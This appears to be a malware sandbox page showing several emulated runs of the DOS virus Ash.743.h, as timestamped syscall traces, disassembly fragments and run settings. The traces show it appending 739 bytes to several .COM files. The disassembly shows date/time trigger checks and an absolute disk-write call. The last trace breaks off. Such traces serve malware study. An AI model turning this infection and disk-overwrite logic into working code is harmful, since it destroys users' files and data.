Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.h

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:37.333399369Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:42:37.335934629Z 78 PC: 1419c | Find first file
2018-12-17T22:42:37.342059107Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:37.348803556Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.368689644Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.371113006Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.374040702Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.388804126Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.391087888Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.397850291Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.406120208Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.410133332Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:42:37.416564036Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.422790205Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.424933228Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.434709042Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.452179448Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.454517525Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.471960319Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.482035439Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.498367737Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:42:37.505549917Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.51574472Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.519212392Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.522670853Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.531122537Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.533080577Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.555065858Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.56421326Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.567214489Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:42:37.574834207Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.581491523Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.583228462Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.589915999Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.598057689Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.599817291Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.617732243Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.626190839Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.62915631Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:42:37.637397955Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.644183108Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.646076437Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.649995564Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.658225209Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.659963783Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.667740705Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.676627517Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.679556206Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:42:37.687364511Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.69434596Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.696092975Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.69930222Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.710184911Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.712051204Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.719105765Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.735346872Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.737987873Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:42:37.745045989Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.752352239Z 66 PC: 141ce | Move file pointer
2018-12-17T22:42:37.753886062Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.756949821Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:42:37.773895259Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:42:37.775249251Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:42:37.781703374Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.813926324Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.816633085Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:42:37.822954997Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:42:37.826526072Z 62 PC: 14190 | Close file
2018-12-17T22:42:37.828456555Z 79 PC: 1419c | Find next file
2018-12-17T22:42:37.846891188Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-17T22:42:37.850269366Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-17T22:42:37.853339554Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.574596358Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.576785885Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.583034742Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.589477381Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.596005002Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.597278207Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.599851384Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.616719905Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.617970649Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.624155217Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.633225811Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.635887163Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.642748016Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.65026444Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.651672838Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.65427124Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.662219659Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.663871513Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.669178107Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.676106645Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.680846153Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.6876359Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.693732934Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.695632931Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.698108044Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.705580682Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.707661037Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.714128711Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.721740746Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.725041Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.731866578Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.738015869Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.740669852Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.743202839Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.751270748Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.753448133Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.759736708Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.76784426Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.77100244Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.777391831Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.783474124Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.785516983Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.788656072Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.796239537Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.79801379Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.804483817Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.812572299Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.816050691Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.822809517Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.828842523Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.830256066Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.833481884Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.843468901Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.844953057Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.852024937Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.860231858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.862953187Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.870450344Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.876953973Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.87854875Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.882657333Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.887737164Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.888839494Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.893517821Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.898694589Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.900485317Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.905188681Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.907030557Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.908298423Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.910598254Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:02:07.912172273Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:02:07.913685712Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.784564191Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.78638335Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.790336728Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.798088533Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.805190171Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.806525319Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.808990356Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.82302222Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.825663363Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.833028667Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.843300387Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.846508348Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.853118619Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.859678334Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.861491967Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.864241628Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.872036568Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.874038005Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.881507317Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.889769186Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.892958238Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.899307392Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.905637939Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.908346408Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.911084022Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.918961008Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.921625443Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.928799772Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.937121763Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.941864704Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.950171906Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.956887849Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.958837583Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.961666097Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.969644391Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.971029178Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.977953596Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.988982596Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.991424678Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.998026601Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.004138861Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.005495871Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.01839623Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.026488556Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.028148653Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.035694954Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.043786447Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.046336809Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.053820278Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.060171603Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.061643899Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.065033381Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.073958594Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.075360662Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.082633548Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.091081177Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.093624135Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.101554145Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.107805882Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.109055842Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.1125212Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.120436388Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.122079856Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.12945063Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.138061341Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.141026043Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.148992957Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.152618025Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.154655647Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.157325934Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:02:08.160430784Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:02:08.162477271Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:07.80366714Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:07.805533906Z 78 PC: 1419c | Find first file
2018-12-25T12:02:07.81124492Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:07.817417854Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:07.824346777Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:07.82564926Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.828470328Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:02:07.84447349Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:02:07.846183653Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:02:07.852485457Z 62 PC: 14190 | Close file
2018-12-25T12:02:07.861538943Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.864117501Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.870379639Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.87739315Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.879479291Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.882154721Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.890332724Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.892705036Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.899801154Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.9081049Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.911465402Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.917799272Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.924088404Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.926615089Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.929504844Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.937532728Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.939999575Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:07.946363968Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:07.954681512Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:07.966453414Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:07.973614236Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:07.979863195Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:07.982147865Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:07.985143843Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:07.993224093Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:07.995925727Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.002579362Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.010824928Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.022686699Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.029050504Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.035316659Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.037963946Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.040887846Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.049867016Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.052352124Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.059053261Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.067314038Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.071484837Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.078126916Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.084654629Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.086920651Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.089857766Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.098522347Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.100990873Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.107610752Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.116252386Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.119843127Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.126251208Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.132484976Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:02:08.134511748Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:02:08.137214346Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:02:08.144789562Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:02:08.146716588Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:02:08.153292733Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.163063339Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.166423116Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:02:08.173249248Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:02:08.175726566Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:02:08.178196166Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:02:08.180555295Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:02:08.18283672Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:02:08.186471021Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7614,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:08.10764358Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:02:08.10930192Z 78 PC: 1419c | Find first file
2018-12-25T12:02:08.114050113Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:08.130788051Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:02:08.139632924Z 66 PC: 141ce | Move file pointer
2018-12-25T12:02:08.141429654Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
